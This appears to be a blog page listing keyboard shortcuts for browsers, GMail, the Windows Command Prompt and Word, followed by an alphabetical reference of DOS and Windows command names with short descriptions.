Ctrl + M: Open new message in integrated mail client.
Ctrl + J: Open Downloads dialog.
F6: Switch to next frame. You must have selected something on the page already, e.g. by use of Tab.
Shift + F6: Switch to previous frame.
Apostrophe ('): Find link as you type.
Slash (/): Find text as you type.

9.) GMail
Note: Must have "keyboard shortcuts" on in settings.
C: Compose new message.
Shift + C: Open new window to compose new message.
Slash (/): Switch focus to search box.
K: Switch focus to the next most recent email. Enter or "O" opens focused email.
J: Switch focus to the next oldest email.
N: Switch focus to the next message in the "conversation." Enter or "O" expands/collapses messages.
P: Switch focus to the previous message.
U: Takes you back to the inbox and checks for new mail.
Y: Various actions depending on current view:
Has no effect in "Sent" and "All Mail" views.
Inbox: Archive email or message.
Starred: Unstar email or message.
Spam: Unmark as spam and move back to "Inbox."
Trash: Move back to "Inbox."
Any label: Remove the label.
X: "Check" an email. Various actions can be performed against all checked emails.
S: "Star" an email. Identical to the more familiar term, "flagging."
R: Reply to the email.
A: Reply to all recipients of the email.
F: Forward an email.
Shift + R: Reply to the email in a new window.
Shift + A: Reply to all recipients of the email in a new window.
Shift + F: Forward an email in a new window.
Shift + 1 (!): Mark an email as spam and remove it from the inbox.
G then I: Switch to "Inbox" view.
G then S: Switch to "Starred" view.
G then A: Switch to "All Mail" view.
G then C: Switch to "Contacts" view.
G then S: Switch to "Drafts" view.


10.) List of F1-F9 Key Commands for the Command Prompt

F1 / right arrow: Repeats the letters of the last command line, one by one.
F2: Displays a dialog asking user to "enter the char to copy up to" of the last command line
F3: Repeats the last command line
F4: Displays a dialog asking user to "enter the char to delete up to" of the last command line
F5: Goes back one command line
F6: Enters the traditional CTRL+Z (^z)
F7: Displays a menu with the command line history
F8: Cycles back through previous command lines (beginning with most recent)
F9: Displays a dialog asking user to enter a command number, where 0 is for first command line entered.
Alt+Enter: toggle fullScreen mode.
up/down: scroll thru/repeat previous entries
Esc: delete line
Note: The buffer allows a maximum of 50 command lines. After this number is reached, the first line will be replaced in sequence.


1.Help

2. F2 Rename an item
3. F3 Open files
4. ALT+F4 Close window or quit program
5. F10 Activate the menu bar in a program
6. CTRL+ ESC open start menu, use the arrow keys to select an item, or TAB to select the taskbar
7. ALT+ TAB Return to previous program, or hold down the ALT key while repeatedly pressing tab to cycle through open programs
8. SHIFT+ DEL delete items permanently without sending to recycle bin
9. CTRL+ A Highlight all the items in window
10. CTRL+ C Copy
11. CTRL+ X Cut
12. CTRL+ V Paste
13. CTRL+ Z Undo
14. CTRL+ Y Redo
FOR INTERNET EXPLORER AND NETSCAPE
15. Home Jumps to the beginning of the page
16. END Jumps to the end of the page
17. ESC Stops the current page from loading
18. F11 Toggles full screen view
19. ALT+ LEFT ARROW Goes back to the previous page
20. ALT+ RIGHT ARROW Goes forward to the next page
21. ALT+ Home Goes to your Home page
22. CTRL+ N Opens a new browser window
23. CTRL+ W Closes the active window
24. CTRL+ O Opens the address book
25. CTRL+ R Reloads the current page
26. CTRL+ B Opens the Organized Favorites or Bookmarks windows
27. CTRL+ D Add the current page to your Favorites or Bookmarks
28. CTRL+ H Opens the history folder
29. CTRL+ F Finds text on the current page


CONTROL OVER A TO Z
One of the keys whose importance may have gone unnoticed by most of us is the Control key (Ctrl). The Control key in combination with the 26 alphabet keys can make a lot of our work easier than we think. The following pair of keys can come in handy when we want tasks faster than while using the mouse.
Operations that can be performed on the text selected:-
30. CTRL+ A Select all
31. CTRL+ B Bold
32. CTRL+ C Copy
33. CTRL+ E Justify center
34. CTRL+ I Italics
35. CTRL+ J Justify full
36. CTRL+ L Justify Left
37. CTRL+ M Indent
38. CTRL+ Q Remove paragraph Formatting
39. CTRL+ R Justify right
40. CTRL+ T Margin release
41. CTRL+ U Underline
These keys combos can be used to do other operations:-
42. CTRL+ D Opens Font Dialog Box
43. CTRL+ F Find
44. CTRL+ G Go to page, section, line, heading etc
45. CTRL+ H Find and replace
46. CTRL+ K Insert Hyperlink
47. CTRL+ N Open a new document
48. CTRL+ O Open an existing document
49. CTRL+ S Save
50 CTRL+ W Close an existing document
51. CTRL+ Y Redo
52. CTRL+ Z Undo
Besides the alphabet keys, a combination of other keys also helps:-
53. CTRL+ LEFT ARROW Jumps one word left
54. CTRL+ RIGHT ARROW Jumps one word right
55. CTRL+ DOWN ARROW Jumps one para down
56. CTRL+ UP ARROW Jumps one para up
57. CTRL+ BACKSPACE Delete one word left
58. CTRL+ DELETE Delete one word right
59. CTRL+ PAGE UP To the beginning of the previous page
60. CTRL+ PAGE DOWN to the beginning of the next page
61. CTRL+ P Print Dialog box

All Dos Commands

ADDUSERS         Add or list users to/from a CSV file
ARP              Address Resolution Protocol
ASSOC            Change file extension associations
ASSOCIAT         One step file association
AT               Schedule a command to run at a later time
ATTRIB           Change file attributes

BOOTCFG          Edit Windows boot settings
BROWSTAT         Get domain, browser and PDC info

CACLS            Change file permissions
CALL             Call one batch program from another
CD               Change Directory - move to a specific Folder
CHANGE           Change Terminal Server Session properties
CHKDSK           Check Disk - check and repair disk problems
CHKNTFS          Check the NTFS file system
CHOICE           Accept keyboard input to a batch file
CIPHER           Encrypt or Decrypt files/folders
CleanMgr         Automated cleanup of Temp files, recycle bin
CLEARMEM         Clear memory leaks
CLIP             Copy STDIN to the Windows clipboard.
CLS              Clear the screen
CLUSTER          Windows Clustering
CMD              Start a new CMD shell
COLOR            Change colors of the CMD window
COMP             Compare the contents of two files or sets of files
COMPACT          Compress files or folders on an NTFS partition
COMPRESS         Compress individual files on an NTFS partition
CON2PRT          Connect or disconnect a Printer
CONVERT          Convert a FAT drive to NTFS.
COPY             Copy one or more files to another location
CSVDE            Import or Export Active Directory data

DATE             Display or set the date
Dcomcnfg         DCOM Configuration Utility
DEFRAG           Defragment hard drive
DEL              Delete one or more files
DELPROF          Delete NT user profiles
DELTREE          Delete a folder and all subfolders
DevCon           Device Manager Command Line Utility
DIR              Display a list of files and folders
DIRUSE           Display disk usage
DISKCOMP         Compare the contents of two floppy disks
DISKCOPY         Copy the contents of one floppy disk to another
DNSSTAT          DNS Statistics
DOSKEY           Edit command line, recall commands, and create macros
DSADD            Add user (computer, group..) to active directory
DSQUERY          List items in active directory
DSMOD            Modify user (computer, group..) in active directory

ECHO             Display message on screen
ENDLOCAL         End localisation of environment changes in a batch file
ERASE            Delete one or more files
EXIT             Quit the CMD shell
EXPAND           Uncompress files
EXTRACT          Uncompress CAB files

FC               Compare two files
FDISK            Disk Format and partition
FIND             Search for a text string in a file
FINDSTR          Search for strings in files
FOR              Conditionally perform a command several times
FORFILES         Batch process multiple files
FORMAT           Format a disk
FREEDISK         Check free disk space (in bytes)
FSUTIL           File and Volume utilities
FTP File         Transfer Protocol
FTYPE            Display or modify file types used in file extension associations

GLOBAL           Display membership of global groups
GOTO             Direct a batch program to jump to a labelled line

HELP             Online Help
HFNETCHK         Network Security Hotfix Checker

IF               Conditionally perform a command
IFMEMBER         Is the current user in an NT Workgroup
IPCONFIG         Configure IP

KILL             Remove a program from memory

LABEL            Edit a disk label
LOCAL            Display membership of local groups
LOGEVENT         Write text to the NT event viewer.
LOGOFF           Log a user off
LOGTIME          Log the date and time in a file

MAPISEND         Send email from the command line
MEM              Display memory usage
MD               Create new folders
MODE             Configure a system device
MORE             Display output, one screen at a time
MOUNTVOL         Manage a volume mount point
MOVE             Move files from one folder to another
MOVEUSER         Move a user from one domain to another
MSG              Send a message
MSIEXEC          Microsoft Windows Installer
MSINFO           Windows NT diagnostics
MSTSC            Terminal Server Connection (Remote Desktop Protocol)
MUNGE            Find and Replace text within file(s)
MV               Copy in-use files

NET              Manage network resources
NETDOM           Domain Manager
NETSH            Configure network protocols
NETSVC           Command-line Service Controller
NBTSTAT          Display networking statistics (NetBIOS over TCP/IP)
NETSTAT          Display networking statistics (TCP/IP)
NOW              Display the current Date and Time
NSLOOKUP         Name server lookup
NTBACKUP         Backup folders to tape
NTRIGHTS         Edit user account rights

PATH             Display or set a search path for executable files
PATHPING         Trace route plus network latency and packet loss
PAUSE            Suspend processing of a batch file and display a message
PERMS            Show permissions for a user
PERFMON          Performance Monitor
PING             Test a network connection
POPD             Restore the previous value of the current directory saved by PUSHD
PORTQRY          Display the status of ports and services
PRINT            Print a text file
PRNCNFG          Display, configure or rename a printer
PRNMNGR          Add, delete, list printers set the default printer
PROMPT           Change the command prompt
PsExec           Execute process remotely
PsFile           Show files opened remotely
PsGetSid         Display the SID of a computer or a user
PsInfo           List information about a system
PsKill           Kill processes by name or process ID
PsList           List detailed information about processes
PsLoggedOn       Who's logged on (locally or via resource sharing)
PsLogList        Event log records
PsPasswd         Change account password
PsService        View and control services
PsShutdown       Shutdown or reboot a computer
PsSuspend        Suspend processes
PUSHD            Save and then change the current directory

QGREP            Search file(s) for lines that match a given pattern.

RASDIAL          Manage RAS connections
RASPHONE         Manage RAS connections
RECOVER          Recover a damaged file from a defective disk.
REG              Read, Set or Delete registry keys and values
REGEDIT          Import or export registry settings
REGSVR32         Register or unregister a DLL
REGINI           Change Registry Permissions
REM              Record comments (remarks) in a batch file
REN              Rename a file or files.
REPLACE          Replace or update one file with another
RD               Delete folder(s)
RDISK            Create a Recovery Disk
RMTSHARE         Share a folder or a printer
ROBOCOPY         Robust File and Folder Copy
ROUTE            Manipulate network routing tables
RUNAS            Execute a program under a different user account
RUNDLL32         Run a DLL command (add/remove print connections)

SC               Service Control
SCHTASKS         Create or Edit Scheduled Tasks
SCLIST           Display NT Services
ScriptIt         Control GUI applications
SET              Display, set, or remove environment variables
SETLOCAL         Begin localisation of environment changes in a batch file
SETX             Set environment variables permanently
SHARE            List or edit a file share or print share
SHIFT            Shift the position of replaceable parameters in a batch file
SHORTCUT         Create a windows shortcut (.LNK file)
SHOWGRPS         List the NT Workgroups a user has joined
SHOWMBRS         List the Users who are members of a Workgroup
SHUTDOWN         Shutdown the computer
SLEEP            Wait for x seconds
SOON             Schedule a command to run in the near future
SORT             Sort input
START            Start a separate window to run a specified program or command
SU               Switch User
SUBINACL         Edit file and folder Permissions, Ownership and Domain
SUBST            Associate a path with a drive letter
SYSTEMINFO       List system configuration

TASKLIST         List running applications and services
TIME             Display or set the system time
TIMEOUT          Delay processing of a batch file
TITLE            Set the window title for a CMD.EXE session
TOUCH            Change file timestamps
TRACERT          Trace route to a remote host
TREE             Graphical display of folder structure
TYPE             Display the contents of a text file

USRSTAT          List domain usernames and last login

VER              Display version information
VERIFY           Verify that files have been saved
VOL              Display a disk label

WHERE            Locate and display files in a directory tree
WHOAMI           Output the current UserName and domain
WINDIFF          Compare the contents of two files or sets of files
WINMSD           Windows system diagnostics
WINMSDP          Windows system diagnostics II
WMIC             WMI Commands

XCACLS           Change file permissions
XCOPY            Copy files and folders

Related Posts Plugin for WordPress, Blogger...
Twitter Delicious Facebook Digg Stumbleupon Favorites More